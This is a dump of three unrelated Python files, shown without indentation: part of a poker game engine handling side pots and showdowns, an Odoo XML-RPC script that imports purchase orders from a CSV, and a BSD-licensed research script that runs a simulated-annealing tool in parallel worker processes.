print('current bets: ', [p.currentbet for p in players])
print('playing hand: ', [p.playing_hand for p in players])
if not players:
return
try:
smallest_bet = min([p.currentbet for p in players if p.playing_hand])
except ValueError:
for p in players:
self._side_pots[self._current_sidepot] += p.currentbet
p.currentbet = 0
return
smallest_players_allin = [p for p,bet in zip(players, [p.currentbet for p in players]) if bet == smallest_bet and p.isallin]
for p in players:
self._side_pots[self._current_sidepot] += min(smallest_bet, p.currentbet)
p.currentbet -= min(smallest_bet, p.currentbet)
p.lastsidepot = self._current_sidepot
if smallest_players_allin:
self._current_sidepot += 1
self.resolve_sidepots(players)
if not self._quiet:
print('sidepots: ', self._side_pots)
def new_round(self):
for player in self._player_dict.values():
player.currentbet = 0
player.playedthisround = False
self._round += 1
self._tocall = 0
self._lastraise = 0
def resolve_game(self, players):
# print('Community cards: ', end='')
# Card.print_pretty_cards(self.community)
if len(players)==1:
players[0].refund(sum(self._side_pots))
# print('Player', players[0].playerID, 'wins the pot (',sum(self._side_pots),')')
self._totalpot = 0
else:
# compute hand ranks
for player in players:
#print(player.hand, self.community)
player.handrank = self._evaluator.evaluate(player.hand, self.community)
# trim side_pots to only include the non-empty side pots
temp_pots = [pot for pot in self._side_pots if pot>0]
# compute who wins each side pot and pay winners
for pot_idx,_ in enumerate(temp_pots):
# print('players last pots', [(p.playerID, p.lastsidepot) for p in players])
# find players involved in given side_pot, compute the winner(s)
pot_contributors = [p for p in players if p.lastsidepot >= pot_idx]
winning_rank = min([p.handrank for p in pot_contributors])
winning_players = [p for p in pot_contributors if p.handrank == winning_rank]
for player in winning_players:
split_amount = int(self._side_pots[pot_idx]/len(winning_players))
if not self._quiet:
print('Player', player.playerID, 'wins side pot (',int(self._side_pots[pot_idx]/len(winning_players)),')')
player.refund(split_amount)
self._side_pots[pot_idx] -= split_amount
# any remaining chips after splitting go to the winner in the earliest position
if self._side_pots[pot_idx]:
earliest = self._first_to_act([player for player in winning_players])
earliest.refund(self._side_pots[pot_idx])
def reset(self):
for player in self._seats:
if not player.emptyplayer and not player.sitting_out:
player.reset_hand()
self.community = []
self._current_sidepot = 0
self._totalpot = 0
self._side_pots = [0]*len(self._seats)
self._deck.shuffle()
self._button = (self._button + 1) % len(self._seats)
while not self._seats[self._button].playing_hand:
self._button = (self._button + 1) % len(self._seats)
def output_state(self, current_player):
return {'players':[player.player_state() for player in self._seats],
'community':self.community,
'my_seat':current_player.get_seat(),
'pocket_cards':current_player.hand,
'pot':self._totalpot,
'button':self._button,
'tocall':(self._tocall-current_player.currentbet),
'stack':current_player.stack,
'bigblind':self._bigblind,
'playerID':current_player.playerID,
'lastraise':self._lastraise,
'minraise':max(self._bigblind, self._lastraise + self._tocall)}
def reset_stacks(self):
for player in self._seats:
player.reset_stack()
def get_ai(self):
for player in self._seats:
if player.get_ai_type() == 0:
return player.ai
|
50_po_history.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
from xmlrpc import client as xmlrpclib
import multiprocessing as mp
from scriptconfig import URL, DB, UID, PSW, WORKERS
# ==================================== Purchase ORDER ====================================
def update_purchase_order(pid, data_pool, error_ids, write_ids, partner_ids, term_ids):
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
while data_pool:
try:
data = data_pool.pop()
order_no = data.get('ORDR-NUM', '')
partner_id = partner_ids.get(data.get('VEND-CODE', ''))
term_id = term_ids.get(data.get('TERM-CODE', ''))
if not partner_id or not term_id:
error_ids.append(order_no)
continue
vals={'name': data.get('ORDR-NUM', ''),
'partner_id': partner_id,
'date_order': data.get('ORDR-DATE'),
'release_date': data.get('ORDR-RELEASE-DATE'),
'payment_term_id': term_id,
# 'state': 'purchase'
}
res = write_ids.get(order_no, [])
if res:
sock.execute(DB, UID, PSW, 'purchase.order', 'write', res, vals)
print(pid, 'UPDATE - PURCHASE ORDER', res)
else:
res = sock.execute(DB, UID, PSW, 'purchase.order', 'create', vals)
print(pid, 'CREATE - PURCHASE ORDER', res, order_no)
if not data_pool:
break
except Exception as e:
print(e)
break
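# Example payload sent to purchase.order by the loop above (CSV column names as used
# above; the values are assumed for illustration only):
#   {'name': 'PO01234', 'partner_id': 842, 'date_order': '2020-01-15',
#    'release_date': '2020-01-20', 'payment_term_id': 7}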
def sync_purchase_orders():
manager = mp.Manager()
data_pool = manager.list()
error_ids = manager.list()
write_ids = manager.dict()
process_Q = []
fp = open('files/polhist1.csv', 'r')
csv_reader = csv.DictReader(fp)
for vals in csv_reader:
data_pool.append(vals)
fp.close()
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
res = sock.execute(DB, UID, PSW, 'res.partner', 'search_read', ['|', ('active', '=', False), ('active', '=', True)], ['customer_code'])
vendor = {rec['customer_code']: rec['id'] for rec in res}
partner_ids = manager.dict(vendor)
res = sock.execute(DB, UID, PSW, 'purchase.order', 'search_read', [], ['name'])
write_ids = {rec['name']: rec['id'] for rec in res}
payment_terms = sock.execute(DB, UID, PSW, 'account.payment.term', 'search_read', [('order_type','=','purchase')], ['id','code'])
term_ids = {term['code']: term['id'] for term in payment_terms}
orders = None
vendor = None
res = None
payment_terms = None
for i in range(WORKERS):
pid = "Worker-%d" % (i + 1)
worker = mp.Process(name=pid, target=update_purchase_order, args=(pid, data_pool, error_ids, write_ids, partner_ids, term_ids))
process_Q.append(worker)
worker.start()
for worker in process_Q:
worker.join()
if __name__ == "__main__":
sync_purchase_orders()
|
multistart.py
|
"""
///////////////////////////////////////////////////////////////////////////////
// Authors: Chester Holtz, Devon Merrill, James (Ting-Chou) Lin, Connie (Yen-Yi) Wu
// (respective Ph.D. advisors: Chung-Kuan Cheng, Andrew B. Kahng, Steven Swanson).
//
// BSD 3-Clause License
//
// Copyright (c) 2018, The Regents of the University of California
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this
// list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of the copyright holder nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE
// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
///////////////////////////////////////////////////////////////////////////////
"""
import random, math
import numpy as np
import numba
from numba import jit
import copy, sys, time
import collections
from operator import itemgetter
from tqdm import tqdm
import itertools
import utils
import multiprocessing as mp
import subprocess
try:
num_cpus = mp.cpu_count()
except NotImplementedError:
num_cpus = 2
"""
for now, make directories associated with each idx manually.
"""
def f(idx):
res = subprocess.check_output(["./sa", "-p","designs/bm1","-i", str(2500),"-j",str(25),"-t",str(0.025), "-x", str(idx)])
return res.strip()[-2:]
def worker(args, output):
output.put(f(*args))
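# Pattern used below: each process runs worker((idx,), output) and pushes the result
# of f(idx) into a managed queue. A minimal sketch of the same idea:
#   out = mp.Manager().Queue()
#   procs = [mp.Process(target=worker, args=((i,), out)) for i in range(num_cpus)]
#   for p in procs: p.start()
#   for p in procs: p.join()
#   results = [out.get() for _ in procs]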
def multistart():
K = max(4,mp.cpu_count())
idx = -1
for k in tqdm(range(K),desc='multistart'):
processes = []
manager = mp.Manager()
output = manager.Queue()
for i in range(num_cpus):
p = mp.Process(target=worker, args=((i,),output))
processes.append(p)
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
print(results)
best_result = max(results,key=itemgetter(1)) # max result by cost
best_cost = best_result[1]
best_idx = best_result[0]
print('best result: ')
print("idx: " + str(best_idx))
print("cost: " + str(best_cost))
return best_cost
multistart()
def nmultistart():
K = max(4,mp.cpu_count())
idx = -1
for k in tqdm(range(K),desc='multistart'):
processes = []
manager = mp.Manager()
output = manager.Queue()
for i in range(num_cpus):
p = mp.Process(target=worker, args=((i,),output))
processes.append(p)
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
print(results)
#best_result = max(results,key=itemgetter(1)) # max result by cost
#if best_result[1] < cost:
# cost = best_result[1]
# idx = best_result[0]
#else:
# cost_history.extend([best_cost]*1000)
print('done')
return results  # best-cost tracking above is commented out, so return the raw results
|